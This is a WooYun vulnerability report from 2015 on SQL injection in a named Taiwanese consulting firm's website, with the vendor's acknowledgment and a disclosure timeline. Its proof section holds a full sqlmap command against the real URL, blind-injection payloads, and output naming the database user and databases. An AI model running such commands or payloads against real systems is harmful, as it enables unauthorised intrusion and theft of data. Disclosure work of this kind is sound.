当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104356

漏洞标题:台灣大型顧問公司SQL Injection

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-03-30 15:41

修复时间:2015-05-18 00:54

公开时间:2015-05-18 00:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向核心白帽子及相关领域专家公开
2015-04-23: 细节向普通白帽子公开
2015-05-03: 细节向实习白帽子公开
2015-05-18: 细节向公众公开

简要描述:

台灣大型顧問公司SQL Injection

详细说明:

QQ截图20150328085230.png


QQ截图20150328085244.png

漏洞证明:

[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.simutech.com.tw/training-list.php?page=1&cid=1" --dbs --passwords --current-user --current-db --
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 08:13:03
[08:13:04] [INFO] resuming back-end DBMS 'mysql'
[08:13:04] [INFO] testing connection to the target URL
[08:13:08] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=1&cid=1 AND 6502=6502
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=1&cid=1 AND SLEEP(5)
---
[08:13:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[08:13:08] [INFO] fetching current user
[08:13:08] [INFO] resumed: simutech@%
current user: 'simutech@%'
[08:13:08] [INFO] fetching current database
[08:13:08] [INFO] resumed: simutech_com_tw_cae
current database: 'simutech_com_tw_cae'
[08:13:08] [INFO] testing if current user is DBA
[08:13:08] [INFO] fetching current user
current user is DBA: False
[08:13:08] [INFO] fetching database users password hashes
[08:13:08] [INFO] fetching database users
[08:13:08] [INFO] fetching number of database users
[08:13:08] [INFO] resumed: 1
[08:13:08] [INFO] resumed: 'simutech'@'%'
[08:13:08] [INFO] fetching number of password hashes for user 'simutech'
[08:13:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:13:08] [INFO] retrieved:
[08:13:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:13:31] [INFO] heuristics detected web page charset 'utf-8'
[08:13:31] [WARNING] reflective value(s) found and filtering out
[08:13:36] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[08:14:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:14:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[08:14:57] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g
[08:14:58] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[08:15:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:15:03] [WARNING] unable to retrieve the number of password hashes for user 'simutech'
[08:15:03] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges
[08:15:03] [INFO] fetching database names
[08:15:03] [INFO] fetching number of databases
[08:15:03] [INFO] resumed: 2
[08:15:03] [INFO] resumed: information_schema
[08:15:03] [INFO] resumed: simutech_com_tw_cae
available databases [2]:
[*] information_schema
[*] simutech_com_tw_cae
[08:15:03] [INFO] fetched data logged to text files under 'E:\INJECT~1\SQLMAP~1.4\Bin\output\www.simutech.com.tw'

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-03 00:53

厂商回复:

感謝通報

最新状态:

暂无